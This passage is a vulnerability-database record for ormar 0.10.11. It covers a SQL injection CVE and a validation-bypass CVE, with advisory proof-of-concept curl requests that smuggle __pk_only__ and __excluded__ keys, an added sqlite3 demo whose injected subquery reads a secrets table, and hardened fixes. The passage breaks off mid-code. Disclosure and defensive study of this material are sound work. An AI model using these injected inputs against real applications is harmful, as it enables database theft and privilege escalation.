{"url":"http://public2.vulnerablecode.io/api/packages/968725?format=json","purl":"pkg:pypi/ormar@0.10.11","type":"pypi","namespace":"","name":"ormar","version":"0.10.11","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.23.1","latest_non_vulnerable_version":"0.23.1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50306?format=json","vulnerability_id":"VCID-fhxs-bfbq-vbbp","summary":"ormar is vulnerable to SQL Injection through aggregate functions min() and max()\n# Report of SQL Injection Vulnerability in Ormar ORM\n\n## A SQL Injection attack can be achieved by passing a crafted string to the min() or max() aggregate functions.\n\n## Brief description\n\nWhen performing aggregate queries, Ormar ORM constructs SQL expressions by passing user-supplied column names directly into `sqlalchemy.text()` without any validation or sanitization. The `min()` and `max()` methods in the `QuerySet` class accept arbitrary string input as the column parameter. While `sum()` and `avg()` are partially protected by an `is_numeric` type check that rejects non-existent fields, `min()` and `max()` skip this validation entirely. As a result, an attacker-controlled string is embedded as raw SQL inside the aggregate function call. In any application that lets request data choose the column passed to these methods, an unauthenticated user can read the entire database contents, including tables unrelated to the queried model, by supplying a subquery as the column parameter.\n\n## Affected versions\n\n```\n0.9.9 - 0.12.2\n0.20.0b1 - 0.22.0 (latest)\n```\n\nThe vulnerable `SelectAction.get_text_clause()` method and the `min()`/`max()` aggregate functions were introduced together in commit `ff9d412` (March 12, 2021) and first released in version **0.9.9**. 
The vulnerable code has never been modified since — `get_text_clause()` is unchanged in every later release in the affected range.\n\nVersions prior to 0.9.9 do not contain the `min()`/`max()` aggregate feature and are not affected.\n\nThe following uses ormar 0.21.0 as an example to illustrate the attack.\n\n## Vulnerability details\n\nWhen performing an aggregate query, the `QuerySet.max()` method (line 721, `queryset.py`) passes the caller-supplied column names to `_query_aggr_function()`. This method creates a `SelectAction` object for each column name. The column string is split by `__` and the last part becomes `self.field_name` — with no validation against the model's actual fields.\n\nThe critical vulnerability is in `SelectAction.get_text_clause()` (lines 41-43, `select_action.py`), which passes `self.field_name` straight into `sqlalchemy.text()`:\n\n```python\n#select_action.py line 41-43\ndef get_text_clause(self) -> sqlalchemy.sql.expression.TextClause:\n    alias = f\"{self.table_prefix}_\" if self.table_prefix else \"\"\n    return sqlalchemy.text(f\"{alias}{self.field_name}\")  # unsanitised user input!\n```\n\nThe `apply_func()` method then wraps this raw text clause inside `func.max()`, producing SQL like `max(<attacker_input>)`. 
Since `sqlalchemy.text()` treats its argument as a raw SQL fragment rather than as a quoted identifier or a bound parameter, any subquery or SQL expression supplied as the column name is executed verbatim by the database engine.\n\nThe `_query_aggr_function()` method (lines 704-719, `queryset.py`) only validates field types for `sum` and `avg`, leaving `min` and `max` completely unprotected:\n\n```python\n#queryset.py line 704-719\nasync def _query_aggr_function(self, func_name: str, columns: List) -> Any:\n    func = getattr(sqlalchemy.func, func_name)\n    select_actions = [\n        SelectAction(select_str=column, model_cls=self.model) for column in columns\n    ]\n    if func_name in [\"sum\", \"avg\"]:          # <-- only sum/avg are checked!\n        if any(not x.is_numeric for x in select_actions):\n            raise QueryDefinitionError(...)\n    select_columns = [x.apply_func(func, use_label=True) for x in select_actions]\n    expr = self.build_select_expression().alias(f\"subquery_for_{func_name}\")\n    expr = sqlalchemy.select(*select_columns).select_from(expr)\n    result = await self.database.fetch_one(expr)\n    return dict(result) if len(result) > 1 else result[0]\n```\n\nTo reproduce the attack, you can follow the steps below, using a FastAPI application with SQLite as an 
example.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26198","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.0693","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06885","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06878","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06915","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06925","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26198"},{"reference_url":"https://github.com/collerek/ormar","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/collerek/ormar"},{"reference_url":"https://github.com/collerek/ormar/commit/a03bae14fe01358d3eaf7e319fcd5db2e4956b16","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-24T20:29:06Z/"}],"url":"https://github.com/collerek/ormar/commit/a03bae14fe01358d3eaf7e319fcd5db2e4956b16"},{"reference_url":"https://github.com/collerek/ormar/releases/tag/0.23.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","sc
oring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-24T20:29:06Z/"}],"url":"https://github.com/collerek/ormar/releases/tag/0.23.0"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129259","reference_id":"1129259","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129259"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26198","reference_id":"CVE-2026-26198","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26198"},{"reference_url":"https://github.com/advisories/GHSA-xxh2-68g9-8jqr","reference_id":"GHSA-xxh2-68g9-8jqr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xxh2-68g9-8jqr"},{"reference_url":"https://github.com/collerek/ormar/security/advisories/GHSA-xxh2-68g9-8jqr","reference_id":"GHSA-xxh2-68g9-8jqr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-24T20:29:06Z/"}],"url":"https://github.com/collerek/ormar/security/advisories/GHSA-xxh2-68g9-8jqr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74204?format=json","purl":"pkg:pypi/ormar@0.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ykh5-vgdj-k3gt"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/ormar@0.23.0"}],"aliases":["CVE-2026-26198","GHSA-xxh2-68g9-8jqr"],"risk_score":4.5,"exploitability":"0.
5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fhxs-bfbq-vbbp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91811?format=json","vulnerability_id":"VCID-ykh5-vgdj-k3gt","summary":"ormar Pydantic Validation Bypass via __pk_only__ and __excluded__ Kwargs Injection in Model Constructor\n### Summary\n\nA Pydantic validation bypass in `ormar`'s model constructor allows any unauthenticated user to skip **all** field validation — type checks, constraints, `@field_validator`/`@model_validator` decorators, choices enforcement, and required-field checks — by injecting `\"__pk_only__\": true` into a JSON request body. The unvalidated data is subsequently persisted to the database. This affects the **canonical usage pattern** recommended in ormar's official documentation and examples.\n\nA secondary `__excluded__` parameter injection uses the same design pattern to selectively nullify arbitrary model fields during construction.\n\n### Details\n\n**Root cause:** `NewBaseModel.__init__` ([`ormar/models/newbasemodel.py`, line 128](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L128)) pops `__pk_only__` directly from user-supplied `**kwargs` before any validation occurs:\n\n```python\n# ormar/models/newbasemodel.py, lines 128-142\npk_only = kwargs.pop(\"__pk_only__\", False)      # ← extracted from user kwargs\nobject.__setattr__(self, \"__pk_only__\", pk_only)\n\nnew_kwargs, through_tmp_dict = self._process_kwargs(kwargs)\n\nif not pk_only:\n    # Normal path: full Pydantic validation\n    new_kwargs = self.serialize_nested_models_json_fields(new_kwargs)\n    self.__pydantic_validator__.validate_python(\n        new_kwargs, self_instance=self\n    )\nelse:\n    # Bypass path: NO validation at all\n    fields_set = {self.ormar_config.pkname}\n    values = new_kwargs\n    object.__setattr__(self, \"__dict__\", values)       # raw dict written directly\n    object.__setattr__(self, 
\"__pydantic_fields_set__\", fields_set)\n```\n\nThe `__pk_only__` flag was designed as an internal optimization for creating lightweight FK placeholder instances in [`ormar/fields/foreign_key.py` (lines 41, 527)](https://github.com/collerek/ormar/blob/master/ormar/fields/foreign_key.py#L41). However, because it is extracted from `**kwargs` via `.pop()` with a `False` default, any external caller that passes user-controlled data to the model constructor can inject this flag.\n\n**Why the canonical FastAPI + ormar pattern is vulnerable:**\n\nOrmar's official example ([`examples/fastapi_quick_start.py`, lines 55-58](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py#L55)) recommends using ormar models directly as FastAPI request body parameters:\n\n```python\n@app.post(\"/items/\", response_model=Item)\nasync def create_item(item: Item):\n    await item.save()\n    return item\n```\n\nFastAPI parses the JSON body and calls `TypeAdapter.validate_python(body_dict)`, which triggers ormar's `__init__`. 
The `__pk_only__` key is popped at line 128 **before** Pydantic's validator inspects the data, so Pydantic never sees it — even `extra='forbid'` would not prevent this, because the key is already consumed by ormar.\n\nThe ormar Pydantic `model_config` (set in [`ormar/models/helpers/pydantic.py`, line 108](https://github.com/collerek/ormar/blob/master/ormar/models/helpers/pydantic.py#L108)) does not set `extra='forbid'`, providing no protection even in theory.\n\n**What is bypassed when `__pk_only__=True`:**\n- All type coercion and type checking (e.g., string for int field)\n- `max_length` constraints on String fields\n- `choices` constraints\n- All `@field_validator` and `@model_validator` decorators\n- `nullable=False` enforcement at the Pydantic level\n- Required-field enforcement (only `pkname` is put in `fields_set`)\n- `serialize_nested_models_json_fields()` preprocessing\n\n**Save path persists unvalidated data to the database:**\n\nAfter construction with `pk_only=True`, calling `.save()` ([`ormar/models/model.py`, lines 89-107](https://github.com/collerek/ormar/blob/master/ormar/models/model.py#L89)) reads fields directly from `self.__dict__` via `_extract_model_db_fields()`, then executes `table.insert().values(**self_fields)` — persisting the unvalidated data to the database with no re-validation.\n\n**Secondary vulnerability — `__excluded__` injection:**\n\nThe same pattern applies to `__excluded__` at [`ormar/models/newbasemodel.py`, line 292](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L292):\n\n```python\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n```\n\nAt lines 326-329, fields listed in `__excluded__` are silently set to `None`:\n\n```python\nfor field_to_nullify in excluded:\n    new_kwargs[field_to_nullify] = None\n```\n\nAn attacker can inject `\"__excluded__\": [\"email\", \"password_hash\"]` to nullify arbitrary fields during construction.\n\n**Affected entry points:**\n\n| Entry Point | 
Exploitable? |\n|---|---|\n| `async def create_item(item: Item)` (FastAPI route) | Yes |\n| `Model.objects.create(**user_dict)` | Yes |\n| `Model(**user_dict)` | Yes |\n| `Model.model_validate(user_dict)` | Yes |\n\n### PoC\n\n**Step 1: Create a FastAPI + ormar application using the canonical pattern from ormar's docs:**\n\n```python\n# app.py\nfrom contextlib import asynccontextmanager\nimport sqlalchemy\nimport uvicorn\nfrom fastapi import FastAPI\nimport ormar\n\nDATABASE_URL = \"sqlite+aiosqlite:///test.db\"\normar_base_config = ormar.OrmarConfig(\n    database=ormar.DatabaseConnection(DATABASE_URL),\n    metadata=sqlalchemy.MetaData(),\n)\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n    database_ = app.state.database\n    if not database_.is_connected:\n        await database_.connect()\n    # Create tables\n    engine = sqlalchemy.create_engine(DATABASE_URL.replace(\"+aiosqlite\", \"\"))\n    ormar_base_config.metadata.create_all(engine)\n    engine.dispose()\n    yield\n    database_ = app.state.database\n    if database_.is_connected:\n        await database_.disconnect()\n\napp = FastAPI(lifespan=lifespan)\ndatabase = ormar.DatabaseConnection(DATABASE_URL)\napp.state.database = database\n\nclass User(ormar.Model):\n    ormar_config = ormar_base_config.copy(tablename=\"users\")\n\n    id: int = ormar.Integer(primary_key=True)\n    name: str = ormar.String(max_length=50)\n    email: str = ormar.String(max_length=100)\n    role: str = ormar.String(max_length=20, default=\"user\")\n    balance: int = ormar.Integer(default=0)\n\n# Canonical ormar pattern from official examples\n@app.post(\"/users/\", response_model=User)\nasync def create_user(user: User):\n    await user.save()\n    return user\n\nif __name__ == \"__main__\":\n    uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n```\n\n**Step 2: Send a normal request (validation works correctly):**\n\n```bash\n# This correctly rejects — \"name\" exceeds max_length=50\ncurl -X POST 
http://127.0.0.1:8000/users/ \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\n    \"email\": \"user@example.com\"\n  }'\n# Returns: 422 Validation Error\n```\n\n**Step 3: Inject `__pk_only__` to bypass ALL validation:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"__pk_only__\": true,\n    \"name\": \"\",\n    \"email\": \"not-an-email\",\n    \"role\": \"superadmin\",\n    \"balance\": -99999\n  }'\n# Returns: 200 OK — all fields persisted to database WITHOUT validation\n# - \"name\" is empty despite being required\n# - \"email\" is not a valid email\n# - \"role\" is \"superadmin\" (bypassing any validator that restricts to \"user\"/\"admin\")\n# - \"balance\" is negative (bypassing any ge=0 constraint)\n```\n\n**Step 4: Inject `__excluded__` to nullify arbitrary fields:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"__excluded__\": [\"email\", \"role\"],\n    \"name\": \"attacker\",\n    \"email\": \"will-be-nullified@example.com\",\n    \"role\": \"will-be-nullified\"\n  }'\n# Returns: 200 OK — email and role are set to NULL regardless of input\n```\n\n### Impact\n\n**Who is impacted:** Every application using ormar's canonical FastAPI integration pattern (`async def endpoint(item: OrmarModel)`) is vulnerable. 
This is the primary usage pattern documented in ormar's official examples and documentation.\n\n**Vulnerability type:** Complete Pydantic validation bypass.\n\n**Impact scenarios:**\n- **Privilege escalation**: If a model has a `role` or `is_admin` field with a Pydantic validator restricting values to `\"user\"`, an attacker can set `role=\"superadmin\"` by bypassing the validator\n- **Data integrity violation**: Type constraints (`max_length`, `ge`/`le`, regex patterns) are all bypassed — invalid data is persisted to the database\n- **Business logic bypass**: Custom `@field_validator` and `@model_validator` decorators (e.g., enforcing email format, age ranges, cross-field dependencies) are entirely skipped\n- **Field nullification** (via `__excluded__`): Audit fields, tracking fields, or required business fields can be selectively set to NULL\n\n**Suggested fix:**\n\nReplace `kwargs.pop(\"__pk_only__\", False)` with a keyword-only parameter that cannot be injected via `**kwargs`:\n\n```python\n# Before (vulnerable)\ndef __init__(self, *args: Any, **kwargs: Any) -> None:\n    ...\n    pk_only = kwargs.pop(\"__pk_only__\", False)\n\n# After (secure)\ndef __init__(self, *args: Any, _pk_only: bool = False, **kwargs: Any) -> None:\n    ...\n    object.__setattr__(self, \"__pk_only__\", _pk_only)\n```\n\nApply the same fix to `__excluded__`:\n\n```python\n# Before (vulnerable)\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n\n# After (secure) — pass via keyword-only _excluded parameter\ndef __init__(self, *args: Any, _pk_only: bool = False, _excluded: set | None = None, **kwargs: Any) -> None:\n    ...\n    # In _process_kwargs:\n    excludes = _excluded or set()\n```\n\nInternal callers in `foreign_key.py` would pass `_pk_only=True` as a named argument. 
A keyword-only parameter named `_pk_only` no longer collides with the `__pk_only__` key, so a JSON body carrying `__pk_only__: true` reaches Pydantic as an ordinary (and rejectable) extra key. Note that Python binds keyword-only parameters from `**` unpacking as well, so `Model(**user_dict)` with a `_pk_only` key in `user_dict` would still set the flag; callers that unpack untrusted dicts should drop keys that are not declared model fields before unpacking, or the internal flag should be routed through a dedicated internal constructor instead of `__init__` kwargs.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27953","reference_id":"","reference_type":"","scores":[{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65898","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65903","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65884","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65895","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.6591","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27953"},{"reference_url":"https://github.com/ormar-orm/ormar","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ormar-orm/ormar"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/
C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newb
asemodel.py#L292","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L292"},{"reference_url":"https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3"},{"reference_url":"https://github.com/ormar-orm/ormar/releases/tag/0.23.1","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/releases/tag/0.23.1"},{"reference_url":"https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-2
0T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27953","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27953"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131494","reference_id":"1131494","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131494"},{"reference_url":"https://github.com/advisories/GHSA-f964-whrq-44h8","reference_id":"GHSA-f964-whrq-44h8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f964-whrq-44h8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114182?format=json","purl":"pkg:pypi/ormar@0.23.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/ormar@0.23.1"}],"aliases":["CVE-2026-27953","GHSA-f964-whrq-44h8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ykh5-vgdj-k3gt"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/ormar@0.10.11"}
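The following is an added example and not code from ormar or from the CVE-2026-26198 advisory above. It reproduces the `min()`/`max()` injection pattern with the standard-library `sqlite3` module (no ormar or SQLAlchemy required) and then shows the check `_query_aggr_function()` lacked: resolve the requested column against the table's real fields and emit it only as a quoted identifier. The `users` and `secrets` tables, the sample rows and the `aggregate_raw`/`aggregate_safe` helpers are constructed for this illustration.

```python
"""Added example (not ormar's code): the raw-SQL column splice behind
CVE-2026-26198 rebuilt on sqlite3, beside the allowlist check it lacked.
Tables, rows and helper names here are constructed for illustration."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: the queried table plus an unrelated table that an
    injected subquery can reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users   (id INTEGER PRIMARY KEY, name TEXT, age INTEGER);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, api_key TEXT);
        INSERT INTO users   VALUES (1, 'alice', 31), (2, 'bob', 27);
        INSERT INTO secrets VALUES (1, 'sk-live-constructed-0001');
        """
    )
    return conn


def aggregate_raw(conn: sqlite3.Connection, func: str, column: str):
    """Vulnerable shape: the caller's string is spliced into the aggregate
    call as raw SQL, which is what sqlalchemy.text(f"{alias}{field_name}")
    wrapped in func.max() amounts to. Do not use."""
    sql = f"SELECT {func}({column}) FROM (SELECT * FROM users) AS subquery_for_{func}"
    return conn.execute(sql).fetchone()[0]


def table_columns(conn: sqlite3.Connection, table: str) -> set:
    """The table's real column names; stands in for the model's field list."""
    return {row[1] for row in conn.execute(f'PRAGMA table_info("{table}")')}


def aggregate_safe(conn: sqlite3.Connection, func: str, column: str):
    """Hardened shape: both the function and the column are checked against
    closed allowlists before they touch the SQL string, and the column is
    emitted as a double-quoted identifier with embedded quotes doubled."""
    if func not in {"min", "max", "sum", "avg"}:
        raise ValueError(f"unsupported aggregate: {func!r}")
    if column not in table_columns(conn, "users"):
        raise ValueError(f"{column!r} is not a field of users")
    ident = '"' + column.replace('"', '""') + '"'
    sql = f"SELECT {func}({ident}) FROM (SELECT * FROM users) AS subquery_for_{func}"
    return conn.execute(sql).fetchone()[0]


# A "column name" that is really a scalar subquery against an unrelated table.
INJECTED_COLUMN = "(SELECT api_key FROM secrets LIMIT 1)"


def demo() -> dict:
    """Run the legitimate and injected column through both helpers."""
    conn = make_db()
    out = {
        "legit_raw": aggregate_raw(conn, "max", "age"),
        "leak_raw": aggregate_raw(conn, "max", INJECTED_COLUMN),
        "legit_safe": aggregate_safe(conn, "max", "age"),
    }
    try:
        aggregate_safe(conn, "max", INJECTED_COLUMN)
        out["leak_safe"] = "not blocked"
    except ValueError:
        out["leak_safe"] = "blocked"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:<11} {value!r}")
```

The raw variant returns the `secrets.api_key` value from a query that was nominally about `users`, which is the cross-table read the advisory describes; the safe variant rejects the same input before any SQL is built. Allowlisting against the schema is the check that matters here, and the identifier quoting is defence in depth for field names that happen to be SQL keywords.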
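The following is an added example and not ormar's code: a minimal model constructor that reproduces the `__pk_only__` kwargs-pop anti-pattern behind CVE-2026-27953, the keyword-only parameter the advisory proposes as a fix, and the residual caveat that Python binds keyword-only parameters from `**` unpacking too, so `Model(**user_dict)` with a `_pk_only` key still flips the flag unless non-field keys are dropped first. `VulnerableModel`, `KwOnlyModel`, `validate()` and `from_untrusted()` are constructed stand-ins for ormar's `NewBaseModel.__init__` and Pydantic validation; the request bodies are constructed sample input.

```python
"""Added example (not ormar's code): the kwargs-pop anti-pattern behind
CVE-2026-27953, the keyword-only fix the advisory proposes, and why callers
that unpack untrusted dicts with ** still need a key filter. All names here
are constructed stand-ins for NewBaseModel.__init__ and Pydantic."""
from typing import Any

# Declared model fields and their expected types (constructed sample model).
FIELDS = {"id": int, "name": str, "role": str}


def validate(data: dict) -> dict:
    """Stand-in for Pydantic's validator: unknown keys, missing required
    fields and wrong types are all rejected with ValueError."""
    unknown = set(data) - set(FIELDS)
    if unknown:
        raise ValueError(f"unknown fields: {sorted(unknown)}")
    for name, typ in FIELDS.items():
        if name not in data:
            raise ValueError(f"missing required field: {name}")
        if not isinstance(data[name], typ):
            raise ValueError(f"{name} must be {typ.__name__}")
    return dict(data)


class VulnerableModel:
    """Mirrors the vulnerable shape: the internal flag is popped out of the
    same **kwargs that carry request data, before validation runs."""

    def __init__(self, **kwargs: Any) -> None:
        pk_only = kwargs.pop("__pk_only__", False)  # reachable from a JSON body
        self.__dict__.update(kwargs if pk_only else validate(kwargs))


class KwOnlyModel:
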